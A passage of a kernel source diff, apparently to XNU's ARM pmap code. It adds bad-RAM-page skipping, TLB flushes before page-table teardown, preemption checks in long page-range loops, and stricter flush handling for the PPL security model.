+ * On most systems that memory runs from first_avail through to avail_end + * with no gaps. + * + * However if the system supports ECC and bad_ram_pages_count > 0, we + * need to be careful and skip those pages. + */ +static unsigned int avail_page_count = 0; +static bool need_ram_ranges_init = true; + +#if defined(__arm64__) +pmap_paddr_t *bad_ram_pages = NULL; +unsigned int bad_ram_pages_count = 0; + +/* + * We use this sub-range of bad_ram_pages for pmap_next_page() + */ +static pmap_paddr_t *skip_pages; +static unsigned int skip_pages_count = 0; + +#define MAX_BAD_RAM_PAGE_COUNT 64 +static pmap_paddr_t bad_ram_pages_arr[MAX_BAD_RAM_PAGE_COUNT]; + +/* + * XXX - temporary code to get the bad pages array from boot-args. + * expects a comma separated list of offsets from the start + * of physical memory to be considered bad. + * + * HERE JOE -- will eventually be replaced by data provided by iboot + */ +static void +parse_bad_ram_pages_boot_arg(void) +{ + char buf[256] = {0}; + char *s = buf; + char *end; + int count = 0; + pmap_paddr_t num; + extern uint64_t strtouq(const char *, char **, int); + + if (!PE_parse_boot_arg_str("bad_ram_pages", buf, sizeof(buf))) { + goto done; + } + + while (*s && count < MAX_BAD_RAM_PAGE_COUNT) { + num = (pmap_paddr_t)strtouq(s, &end, 0); + if (num == 0) { + break; + } + num &= ~PAGE_MASK; + + bad_ram_pages_arr[count++] = gDramBase + num; + + if (*end != ',') { + break; + } + + s = end + 1; + } + +done: + bad_ram_pages = bad_ram_pages_arr; + bad_ram_pages_count = count; +} + +/* + * Comparison routine for qsort of array of physical addresses. + */ +static int +pmap_paddr_cmp(void *a, void *b) +{ + pmap_paddr_t *x = a; + pmap_paddr_t *y = b; + if (*x < *y) { + return -1; + } + return *x > *y; +} +#endif /* defined(__arm64__) */ + +/* + * Look up ppn in the sorted bad_ram_pages array. 
+ */ +bool +pmap_is_bad_ram(__unused ppnum_t ppn) +{ +#if defined(__arm64__) + pmap_paddr_t pa = ptoa(ppn); + int low = 0; + int high = bad_ram_pages_count - 1; + int mid; + + while (low <= high) { + mid = (low + high) / 2; + if (bad_ram_pages[mid] < pa) { + low = mid + 1; + } else if (bad_ram_pages[mid] > pa) { + high = mid - 1; + } else { + return true; + } + } +#endif /* defined(__arm64__) */ + return false; +} + +/* + * Initialize the count of available pages. If we have bad_ram_pages, then sort the list of them. + * No lock needed here, as this code is called while kernel boot up is single threaded. + */ +static void +initialize_ram_ranges(void) +{ + pmap_paddr_t first = first_avail; + pmap_paddr_t end = avail_end; + + assert(first <= end); + assert(first == (first & ~PAGE_MASK)); + assert(end == (end & ~PAGE_MASK)); + avail_page_count = atop(end - first); + +#if defined(__arm64__) + /* + * XXX Temporary code for testing, until there is iboot support + * + * Parse a list of known bad pages from a boot-args. + */ + parse_bad_ram_pages_boot_arg(); + + /* + * Sort and filter the bad pages list and adjust avail_page_count. 
+ */ + if (bad_ram_pages_count != 0) { + qsort(bad_ram_pages, bad_ram_pages_count, sizeof(*bad_ram_pages), (cmpfunc_t)pmap_paddr_cmp); + skip_pages = bad_ram_pages; + skip_pages_count = bad_ram_pages_count; + + /* ignore any pages before first */ + while (skip_pages_count > 0 && skip_pages[0] < first) { + --skip_pages_count; + ++skip_pages; + } + + /* ignore any pages at or after end */ + while (skip_pages_count > 0 && skip_pages[skip_pages_count - 1] >= end) { + --skip_pages_count; + } + + avail_page_count -= skip_pages_count; + } +#endif /* defined(__arm64__) */ + need_ram_ranges_init = false; +} + unsigned int pmap_free_pages( void) { + if (need_ram_ranges_init) { + initialize_ram_ranges(); + } + return avail_page_count; +} + +unsigned int +pmap_free_pages_span( + void) +{ + if (need_ram_ranges_init) { + initialize_ram_ranges(); + } return (unsigned int)atop(avail_end - first_avail); } @@ -5066,14 +5312,39 @@ boolean_t pmap_next_page( ppnum_t *pnum) { + if (need_ram_ranges_init) { + initialize_ram_ranges(); + } + +#if defined(__arm64__) + /* + * Skip over any known bad pages. + */ + while (skip_pages_count > 0 && first_avail == skip_pages[0]) { + first_avail += PAGE_SIZE; + ++skip_pages; + --skip_pages_count; + } +#endif /* defined(__arm64__) */ + if (first_avail != avail_end) { *pnum = (ppnum_t)atop(first_avail); first_avail += PAGE_SIZE; + assert(avail_page_count > 0); + --avail_page_count; return TRUE; } + assert(avail_page_count == 0); return FALSE; } +void +pmap_retire_page( + __unused ppnum_t pnum) +{ + /* XXX Justin TBD - mark the page as unusable in pmap data structures */ +} + /* * Initialize the pmap module. @@ -5670,7 +5941,7 @@ pmap_deallocate_all_leaf_tts(pmap_t pmap, tt_entry_t * first_ttep, unsigned leve /* Remove the TTE. 
*/ pmap_lock(pmap); - pmap_tte_deallocate(pmap, ttep, level); + pmap_tte_deallocate(pmap, 0, 0, false, ttep, level); pmap_unlock(pmap); } } @@ -5742,7 +6013,7 @@ pmap_destroy_internal( for (i = 0; i < pmap->tte_index_max; i++) { ttep = &pmap->tte[i]; if ((*ttep & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) { - pmap_tte_deallocate(pmap, ttep, PMAP_TT_L1_LEVEL); + pmap_tte_deallocate(pmap, 0, 0, false, ttep, PMAP_TT_L1_LEVEL); } } pmap_unlock(pmap); @@ -6187,12 +6458,18 @@ pmap_tt_deallocate( * must have a refcnt of zero before the TTE can be removed. * * @param pmap The pmap containing the page table whose TTE is being removed. + * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance + * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance + * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance * @param ttep Pointer to the TTE that should be cleared out. * @param level The level of the page table that contains the TTE to be removed. */ static void pmap_tte_remove( pmap_t pmap, + vm_offset_t va_start, + vm_offset_t va_end, + bool need_strong_sync, tt_entry_t *ttep, unsigned int level) { @@ -6222,6 +6499,17 @@ pmap_tte_remove( *ttep = (tt_entry_t) 0; FLUSH_PTE_STRONG(ttep); #endif /* (__ARM_VMSA__ == 7) */ + // If given a VA range, we're being asked to flush the TLB before the table in ttep is freed. 
+ if (va_end > va_start) { +#if (__ARM_VMSA__ == 7) + // Ensure intermediate translations are flushed for each 1MB block + flush_mmu_tlb_entry_async((va_start & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff)); + flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); + flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 2 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); + flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); +#endif + PMAP_UPDATE_TLBS(pmap, va_start, va_end, need_strong_sync); + } } /** @@ -6235,6 +6523,9 @@ pmap_tte_remove( * must have a refcnt of PT_DESC_REFCOUNT in their page table descriptor. * * @param pmap The pmap that owns the page table to be deallocated. + * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance + * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance + * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance * @param ttep Pointer to the `level` TTE to remove. * @param level The level of the table that contains an entry pointing to the * table to be removed. The deallocated page table will be a @@ -6244,6 +6535,9 @@ pmap_tte_remove( static void pmap_tte_deallocate( pmap_t pmap, + vm_offset_t va_start, + vm_offset_t va_end, + bool need_strong_sync, tt_entry_t *ttep, unsigned int level) { @@ -6261,7 +6555,7 @@ pmap_tte_deallocate( } #endif /* MACH_ASSERT */ - pmap_tte_remove(pmap, ttep, level); + pmap_tte_remove(pmap, va_start, va_end, need_strong_sync, ttep, level); if ((tte & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) { uint64_t pmap_page_size = pt_attr_page_size(pmap_get_pt_attr(pmap)); @@ -6301,19 +6595,17 @@ pmap_tte_deallocate( * entirely within one pte-page. This is NOT checked. * Assumes that the pte-page exists. 
* - * Returns the number of PTE changed, and sets *rmv_cnt - * to the number of SPTE changed. + * Returns the number of PTE changed */ static int pmap_remove_range( pmap_t pmap, vm_map_address_t va, pt_entry_t *bpte, - pt_entry_t *epte, - uint32_t *rmv_cnt) + pt_entry_t *epte) { bool need_strong_sync = false; - int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, rmv_cnt, + int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, NULL, &need_strong_sync, PMAP_OPTIONS_REMOVE); if (num_changed > 0) { PMAP_UPDATE_TLBS(pmap, va, @@ -6470,11 +6762,12 @@ pmap_remove_range_options( vm_map_address_t va, pt_entry_t *bpte, pt_entry_t *epte, - uint32_t *rmv_cnt, + vm_map_address_t *eva, bool *need_strong_sync __unused, int options) { pt_entry_t *cpte; + size_t npages = 0; int num_removed, num_unwired; int num_pte_changed; int pai = 0; @@ -6482,11 +6775,12 @@ pmap_remove_range_options( int num_external, num_internal, num_reusable; int num_alt_internal; uint64_t num_compressed, num_alt_compressed; + int16_t refcnt = 0; pmap_assert_locked_w(pmap); const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap); - uint64_t pmap_page_size = pt_attr_page_size(pt_attr); + uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr); if (__improbable((uintptr_t)epte > (((uintptr_t)bpte + pmap_page_size) & ~(pmap_page_size - 1)))) { panic("%s: PTE range [%p, %p) in pmap %p crosses page table boundary", __func__, bpte, epte, pmap); @@ -6503,10 +6797,18 @@ pmap_remove_range_options( num_alt_compressed = 0; for (cpte = bpte; cpte < epte; - cpte += 1, va += pmap_page_size) { + cpte += PAGE_RATIO, va += pmap_page_size) { pt_entry_t spte; boolean_t managed = FALSE; + /* + * Check for pending preemption on every iteration: the PV list may be arbitrarily long, + * so we need to be as aggressive as possible in checking for preemption when we can. 
+ */ + if (__improbable((eva != NULL) && npages++ && pmap_pending_preemption())) { + *eva = va; + break; + } spte = *((volatile pt_entry_t*)cpte); #if CONFIG_PGTRACE @@ -6539,9 +6841,7 @@ pmap_remove_range_options( * our "compressed" markers, * so let's update it here. */ - if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) { - panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte); - } + --refcnt; spte = *((volatile pt_entry_t*)cpte); } /* @@ -6603,12 +6903,7 @@ pmap_remove_range_options( (pmap != kernel_pmap)) { assertf(!ARM_PTE_IS_COMPRESSED(spte, cpte), "unexpected compressed pte %p (=0x%llx)", cpte, (uint64_t)spte); assertf((spte & ARM_PTE_TYPE_VALID) == ARM_PTE_TYPE, "invalid pte %p (=0x%llx)", cpte, (uint64_t)spte); - if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) { - panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte); - } - if (rmv_cnt) { - (*rmv_cnt)++; - } + --refcnt; } if (pte_is_wired(spte)) { @@ -6636,9 +6931,12 @@ pmap_remove_range_options( * Update the counts */ OSAddAtomic(-num_removed, (SInt32 *) &pmap->stats.resident_count); - pmap_ledger_debit(pmap, task_ledgers.phys_mem, num_removed * pmap_page_size * PAGE_RATIO); + pmap_ledger_debit(pmap, task_ledgers.phys_mem, num_removed * pmap_page_size); if (pmap != kernel_pmap) { + if ((refcnt != 0) && (OSAddAtomic16(refcnt, (SInt16 *) &(ptep_get_info(bpte)->refcnt)) <= 0)) { + panic("pmap_remove_range_options: over-release of ptdp %p for pte [%p, %p)", ptep_get_ptd(bpte), bpte, epte); + } /* update pmap stats... */ OSAddAtomic(-num_unwired, (SInt32 *) &pmap->stats.wired_count); if (num_external) { @@ -6675,17 +6973,17 @@ pmap_remove_range_options( orig_compressed); } /* ... 
and ledgers */ - pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO); - pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO); + pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pmap_page_size); + pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pmap_page_size); /* make needed adjustments to phys_footprint */ pmap_ledger_debit(pmap, task_ledgers.phys_footprint, ((num_internal - num_alt_internal) + (num_compressed - - num_alt_compressed)) * pmap_page_size * PAGE_RATIO); + num_alt_compressed)) * pmap_page_size); } /* flush the ptable entries we have written */ @@ -6713,20 +7011,19 @@ pmap_remove( pmap_remove_options(pmap, start, end, PMAP_OPTIONS_REMOVE); } -MARK_AS_PMAP_TEXT static int +MARK_AS_PMAP_TEXT static vm_map_address_t pmap_remove_options_internal( pmap_t pmap, vm_map_address_t start, vm_map_address_t end, int options) { - int remove_count = 0; + vm_map_address_t eva = end; pt_entry_t *bpte, *epte; pt_entry_t *pte_p; tt_entry_t *tte_p; - uint32_t rmv_spte = 0; + int remove_count = 0; bool need_strong_sync = false; - bool flush_tte = false; if (__improbable(end < start)) { panic("%s: invalid address range %p, %p", __func__, (void*)start, (void*)end); @@ -6749,13 
+7046,12 @@ pmap_remove_options_internal( bpte = &pte_p[pte_index(pmap, pt_attr, start)]; epte = bpte + ((end - start) >> pt_attr_leaf_shift(pt_attr)); - remove_count += pmap_remove_range_options(pmap, start, bpte, epte, - &rmv_spte, &need_strong_sync, options); + remove_count = pmap_remove_range_options(pmap, start, bpte, epte, &eva, + &need_strong_sync, options); - if (rmv_spte && (ptep_get_info(pte_p)->refcnt == 0) && - (pmap != kernel_pmap) && (pmap->nested == FALSE)) { - pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr)); - flush_tte = true; + if ((pmap != kernel_pmap) && (pmap->nested == FALSE) && (ptep_get_info(pte_p)->refcnt == 0)) { + pmap_tte_deallocate(pmap, start, eva, need_strong_sync, tte_p, pt_attr_twig_level(pt_attr)); + remove_count = 0; // pmap_tte_deallocate has flushed the TLB for us } } @@ -6763,12 +7059,9 @@ done: pmap_unlock(pmap); if (remove_count > 0) { - PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync); - } else if (flush_tte) { - pmap_get_pt_ops(pmap)->flush_tlb_tte_async(start, pmap); - sync_tlb_flush(); + PMAP_UPDATE_TLBS(pmap, start, eva, need_strong_sync); } - return remove_count; + return eva; } void @@ -6778,7 +7071,6 @@ pmap_remove_options( vm_map_address_t end, int options) { - int remove_count = 0; vm_map_address_t va; if (pmap == PMAP_NULL) { @@ -6801,6 +7093,7 @@ pmap_remove_options( pmap, (uint64_t)start, (uint64_t)end); } #endif + assert(get_preemption_level() == 0); /* * Invalidate the translation buffer first @@ -6815,14 +7108,12 @@ pmap_remove_options( } #if XNU_MONITOR - remove_count += pmap_remove_options_ppl(pmap, va, l, options); + va = pmap_remove_options_ppl(pmap, va, l, options); pmap_ledger_check_balance(pmap); #else - remove_count += pmap_remove_options_internal(pmap, va, l, options); + va = pmap_remove_options_internal(pmap, va, l, options); #endif - - va = l; } PMAP_TRACE(2, PMAP_CODE(PMAP__REMOVE) | DBG_FUNC_END); @@ -7061,6 +7352,8 @@ pmap_page_protect_options_with_flush_range( remove = FALSE; 
break; default: + /* PPL security model requires that we flush TLBs before we exit if the page may be recycled. */ + options = options & ~PMAP_OPTIONS_NOFLUSH; remove = TRUE; break; } @@ -7326,13 +7619,17 @@ pmap_page_protect_options_with_flush_range( if (*pte_p != ARM_PTE_TYPE_FAULT && !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p) && *pte_p != tmplate) { - WRITE_PTE_STRONG(pte_p, tmplate); + if (options & PMAP_OPTIONS_NOFLUSH) { + WRITE_PTE_FAST(pte_p, tmplate); + } else { + WRITE_PTE_STRONG(pte_p, tmplate); + } update = TRUE; } } /* Invalidate TLBs for all CPUs using it */ - if (update) { + if (update && !(options & PMAP_OPTIONS_NOFLUSH)) { if (remove || !flush_range || ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) { pmap_get_pt_ops(pmap)->flush_tlb_region_async(va, @@ -7373,15 +7670,26 @@ protect_skip_pve: } } - UNLOCK_PVH(pai); - if (flush_range && tlb_flush_needed) { if (!remove) { flush_range->ptfr_flush_needed = true; tlb_flush_needed = FALSE; } } - if (tlb_flush_needed) { + + /* + * If we removed PV entries, ensure prior TLB flushes are complete before we drop the PVH + * lock to allow the backing pages to be repurposed. This is a security precaution, aimed + * primarily at XNU_MONITOR configurations, to reduce the likelihood of an attacker causing + * a page to be repurposed while it is still live in the TLBs. + */ + if (remove && tlb_flush_needed) { + sync_tlb_flush(); + } + + UNLOCK_PVH(pai); + + if (!remove && tlb_flush_needed) { sync_tlb_flush(); } @@ -7394,8 +7702,19 @@ MARK_AS_PMAP_TEXT static void pmap_page_protect_options_internal( ppnum_t ppnum, vm_prot_t prot, - unsigned int options) + unsigned int options, + void *arg) { + if (arg != NULL) { + /* + * If the argument is non-NULL, the VM layer is conveying its intention that the TLBs should + * ultimately be flushed. 
The nature of ARM TLB maintenance is such that we can flush the + * TLBs much more precisely if we do so inline with the pagetable updates, and PPL security + * model requires that we not exit the PPL without performing required TLB flushes anyway. + * In that case, force the flush to take place. + */ + options &= ~PMAP_OPTIONS_NOFLUSH; + } pmap_page_protect_options_with_flush_range(ppnum, prot, options, NULL); } @@ -7404,7 +7723,7 @@ pmap_page_protect_options( ppnum_t ppnum, vm_prot_t prot, unsigned int options, - __unused void *arg) + void *arg) { pmap_paddr_t phys = ptoa(ppnum); @@ -7425,9 +7744,9 @@ pmap_page_protect_options( PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_START, ppnum, prot); #if XNU_MONITOR - pmap_page_protect_options_ppl(ppnum, prot, options); + pmap_page_protect_options_ppl(ppnum, prot, options, arg); #else - pmap_page_protect_options_internal(ppnum, prot, options); + pmap_page_protect_options_internal(ppnum, prot, options, arg); #endif PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_END); @@ -7482,7 +7801,7 @@ pmap_protect( pmap_protect_options(pmap, b, e, prot, 0, NULL); } -MARK_AS_PMAP_TEXT static void +MARK_AS_PMAP_TEXT static vm_map_address_t pmap_protect_options_internal( pmap_t pmap, vm_map_address_t start, @@ -7526,7 +7845,7 @@ pmap_protect_options_internal( break; case VM_PROT_READ | VM_PROT_WRITE: case VM_PROT_ALL: - return; /* nothing to do */ + return end; /* nothing to do */ default: should_have_removed = TRUE; } @@ -7550,6 +7869,10 @@ pmap_protect_options_internal( set_NX = TRUE; } + const uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr); + vm_map_address_t va = start; + unsigned int npages = 0; + VALIDATE_PMAP(pmap); pmap_lock(pmap); @@ -7563,7 +7886,12 @@ pmap_protect_options_internal( for (pte_p = bpte_p; pte_p < epte_p; - pte_p += PAGE_RATIO) { + pte_p += PAGE_RATIO, va += pmap_page_size) { + ++npages; + if (__improbable(!(npages % PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL) && + 
pmap_pending_preemption())) { + break; + } pt_entry_t spte; #if DEVELOPMENT || DEBUG boolean_t force_write = FALSE; @@ -7708,11 +8036,14 @@ pmap_protect_options_internal( UNLOCK_PVH(pai); } } - FLUSH_PTE_RANGE_STRONG(bpte_p, epte_p); - PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync); + FLUSH_PTE_RANGE_STRONG(bpte_p, pte_p); + PMAP_UPDATE_TLBS(pmap, start, va, need_strong_sync); + } else { + va = end; } pmap_unlock(pmap); + return va; } void @@ -7733,6 +8064,8 @@ pmap_protect_options( pmap, (uint64_t)b, (uint64_t)e); } + assert(get_preemption_level() == 0); + #if DEVELOPMENT || DEBUG if (options & PMAP_OPTIONS_PROTECT_IMMEDIATE) { if ((prot & VM_PROT_ALL) == VM_PROT_NONE) { @@ -7771,12 +8104,10 @@ pmap_protect_options( } #if XNU_MONITOR - pmap_protect_options_ppl(pmap, beg, l, prot, options, args); + beg = pmap_protect_options_ppl(pmap, beg, l, prot, options, args); #else - pmap_protect_options_internal(pmap, beg, l, prot, options, args); + beg = pmap_protect_options_internal(pmap, beg, l, prot, options, args); #endif - - beg = l; } PMAP_TRACE(2, PMAP_CODE(PMAP__PROTECT) | DBG_FUNC_END); @@ -8127,6 +8458,12 @@ pmap_enter_options_internal( VALIDATE_PMAP(pmap); +#if XNU_MONITOR + if (__improbable((options & PMAP_OPTIONS_NOWAIT) == 0)) { + panic("pmap_enter_options() called without PMAP_OPTIONS_NOWAIT set"); + } +#endif + __unused const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap); if ((v) & pt_attr_leaf_offmask(pt_attr)) { @@ -8201,7 +8538,7 @@ Pmap_enter_retry: spte = *pte_p; - if (ARM_PTE_IS_COMPRESSED(spte, pte_p)) { + if (ARM_PTE_IS_COMPRESSED(spte, pte_p) && !refcnt_updated) { /* * "pmap" should be locked at this point, so this should * not race with another pmap_enter() or pmap_remove_range(). 
@@ -8235,7 +8572,7 @@ Pmap_enter_retry: } if ((spte != ARM_PTE_TYPE_FAULT) && (pte_to_pa(spte) != pa)) { - pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO, 0); + pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO); } pte = pa_to_pte(pa) | ARM_PTE_TYPE; @@ -8290,7 +8627,7 @@ Pmap_enter_retry: vm_map_address_t nest_vaddr; pt_entry_t *nest_pte_p; - nest_vaddr = v - pmap->nested_region_addr + pmap->nested_region_addr; + nest_vaddr = v; if ((nest_vaddr >= pmap->nested_region_addr) && (nest_vaddr < (pmap->nested_region_addr + pmap->nested_region_size)) @@ -8310,6 +8647,7 @@ Pmap_enter_retry: #endif if (prot & VM_PROT_WRITE) { if (pa_valid(pa) && (!pa_test_bits(pa, PP_ATTR_MODIFIED))) { + assert(!pmap->nested); /* no write access in a nested pmap */ if (fault_type & VM_PROT_WRITE) { if (set_XO) { pte |= pt_attr_leaf_rwna(pt_attr); @@ -8323,7 +8661,11 @@ Pmap_enter_retry: } else { pte |= pt_attr_leaf_ro(pt_attr); } - pa_set_bits(pa, PP_ATTR_REFERENCED); + /* + * Mark the page as MODFAULT so that a subsequent write + * may be handled through arm_fast_fault(). 
+ */ + pa_set_bits(pa, PP_ATTR_REFERENCED | PP_ATTR_MODFAULT); pte_set_was_writeable(pte, true); } } else { @@ -9336,18 +9678,19 @@ phys_attribute_clear_with_flush_range( vm_prot_t allow_mode = VM_PROT_ALL; #if XNU_MONITOR - if (bits & PP_ATTR_PPL_OWNED_BITS) { + if (__improbable(bits & PP_ATTR_PPL_OWNED_BITS)) { panic("%s: illegal request, " "pn=%u, bits=%#x, options=%#x, arg=%p, flush_range=%p", __FUNCTION__, pn, bits, options, arg, flush_range); } #endif + if ((arg != NULL) || (flush_range != NULL)) { + options = options & ~PMAP_OPTIONS_NOFLUSH; + } - if ((bits & PP_ATTR_MODIFIED) && - (options & PMAP_OPTIONS_NOFLUSH) && - (arg == NULL) && - (flush_range == NULL)) { + if (__improbable((bits & PP_ATTR_MODIFIED) && + (options & PMAP_OPTIONS_NOFLUSH))) { panic("phys_attribute_clear(0x%x,0x%x,0x%x,%p,%p): " "should not clear 'modified' without flushing TLBs\n", pn, bits, options, arg, flush_range); @@ -9358,7 +9701,7 @@ phys_attribute_clear_with_flush_range( if (options & PMAP_OPTIONS_CLEAR_WRITE) { assert(bits == PP_ATTR_MODIFIED); - pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), 0, flush_range); + pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), options, flush_range); /* * We short circuit this case; it should not need to * invoke arm_force_fast_fault, so just clear the modified bit. 
@@ -9402,7 +9745,7 @@ phys_attribute_clear_internal( } #if __ARM_RANGE_TLBI__ -MARK_AS_PMAP_TEXT static void +MARK_AS_PMAP_TEXT static vm_map_address_t phys_attribute_clear_twig_internal( pmap_t pmap, vm_map_address_t start, @@ -9415,12 +9758,15 @@ phys_attribute_clear_twig_internal( const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap); assert(end >= start); assert((end - start) <= pt_attr_twig_size(pt_attr)); + const uint64_t pmap_page_size = pt_attr_page_size(pt_attr); + vm_map_address_t va = start; pt_entry_t *pte_p, *start_pte_p, *end_pte_p, *curr_pte_p; tt_entry_t *tte_p; tte_p = pmap_tte(pmap, start); + unsigned int npages = 0; if (tte_p == (tt_entry_t *) NULL) { - return; + return end; } if ((*tte_p & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) { @@ -9429,7 +9775,10 @@ phys_attribute_clear_twig_internal( start_pte_p = &pte_p[pte_index(pmap, pt_attr, start)]; end_pte_p = start_pte_p + ((end - start) >> pt_attr_leaf_shift(pt_attr)); assert(end_pte_p >= start_pte_p); - for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++) { + for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++, va += pmap_page_size) { + if (__improbable(npages++ && pmap_pending_preemption())) { + return va; + } pmap_paddr_t pa = pte_to_pa(*((volatile pt_entry_t*)curr_pte_p)); if (pa_valid(pa)) { ppnum_t pn = (ppnum_t) atop(pa); @@ -9437,9 +9786,10 @@ phys_attribute_clear_twig_internal( } } } + return end; } -MARK_AS_PMAP_TEXT static void +MARK_AS_PMAP_TEXT static vm_map_address_t phys_attribute_clear_range_internal( pmap_t pmap, vm_map_address_t start, @@ -9471,17 +9821,21 @@ phys_attribute_clear_range_internal( curr_end = end; } - phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range); - va = curr_end; + va = phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range); + if ((va < curr_end) || pmap_pending_preemption()) { + break; + } } pmap_unlock_ro(pmap); if (flush_range.ptfr_flush_needed) { + 
flush_range.ptfr_end = va; pmap_get_pt_ops(pmap)->flush_tlb_region_async( flush_range.ptfr_start, flush_range.ptfr_end - flush_range.ptfr_start, flush_range.ptfr_pmap); sync_tlb_flush(); } + return va; } static void @@ -9492,13 +9846,17 @@ phys_attribute_clear_range( unsigned int bits, unsigned int options) { + assert(get_preemption_level() == 0); + PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_START, bits); + while (start < end) { #if XNU_MONITOR - phys_attribute_clear_range_ppl(pmap, start, end, bits, options); + start = phys_attribute_clear_range_ppl(pmap, start, end, bits, options); #else - phys_attribute_clear_range_internal(pmap, start, end, bits, options); + start = phys_attribute_clear_range_internal(pmap, start, end, bits, options); #endif + } PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_END); } @@ -10168,8 +10526,9 @@ arm_force_fast_fault_with_flush_range( #endif /* MACH_ASSERT && XNU_MONITOR */ if (result && update_pte) { - if (*pte_p != ARM_PTE_TYPE_FAULT && - !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p)) { + if (options & PMAP_OPTIONS_NOFLUSH) { + WRITE_PTE_FAST(pte_p, tmplate); + } else { WRITE_PTE_STRONG(pte_p, tmplate); if (!flush_range || ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) { @@ -10177,9 +10536,6 @@ arm_force_fast_fault_with_flush_range( pt_attr_page_size(pt_attr) * PAGE_RATIO, pmap); } tlb_flush_needed = TRUE; - } else { - WRITE_PTE(pte_p, tmplate); - __builtin_arm_isb(ISB_SY); } } @@ -10238,7 +10594,7 @@ arm_force_fast_fault_internal( vm_prot_t allow_mode, int options) { - if (__improbable((options & PMAP_OPTIONS_FF_LOCKED) != 0)) { + if (__improbable((options & (PMAP_OPTIONS_FF_LOCKED | PMAP_OPTIONS_NOFLUSH)) != 0)) { panic("arm_force_fast_fault(0x%x, 0x%x, 0x%x): invalid options", ppnum, allow_mode, options); } return arm_force_fast_fault_with_flush_range(ppnum, allow_mode, options, NULL); @@ -10349,6 +10705,7 @@ arm_clear_fast_fault( if (pmap == 
